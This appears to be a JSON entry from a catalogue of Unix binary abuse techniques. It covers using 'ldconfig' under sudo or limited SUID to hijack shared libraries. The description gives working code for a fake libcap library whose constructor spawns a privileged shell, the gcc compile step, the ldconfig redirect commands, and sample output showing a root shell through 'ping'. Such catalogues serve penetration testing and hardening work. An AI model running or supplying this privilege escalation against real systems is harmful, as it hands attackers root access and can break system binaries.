You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
17 lines
1.5 KiB
JSON
17 lines
1.5 KiB
JSON
{
|
|
"description": "Follows a minimal example of how to use the described technique (details may change across different distributions). Run the code associated with the technique. Identify a target SUID executable, for example the 'libcap' library of 'ping':\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000)\n```\n\nCreate a fake library that spawns a shell at bootstrap:\n\n```\necho '#include <unistd.h>\n\n__attribute__((constructor))\nstatic void init() {\n execl(\"/bin/sh\", \"/bin/sh\", \"-p\", NULL);\n}\n' >\"$TF/lib.c\"\n```\n\nCompile it with:\n\n```\ngcc -fPIC -shared \"$TF/lib.c\" -o \"$TF/libcap.so.2\"\n```\n\nRun 'ldconfig' again as described below then just run 'ping' to obtain a root shell:\n\n```\n$ ping\n# id\nuid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)\n```",
|
|
"functions": {
|
|
"sudo": [
|
|
{
|
|
"description": "This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.",
|
|
"code": "TF=$(mktemp -d)\necho \"$TF\" > \"$TF/conf\"\n# move malicious libraries in $TF\nsudo ldconfig -f \"$TF/conf\"\n"
|
|
}
|
|
],
|
|
"limited-suid": [
|
|
{
|
|
"description": "This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.",
|
|
"code": "TF=$(mktemp -d)\necho \"$TF\" > \"$TF/conf\"\n# move malicious libraries in $TF\n./ldconfig -f \"$TF/conf\"\n"
|
|
}
|
|
]
|
|
}
|
|
} |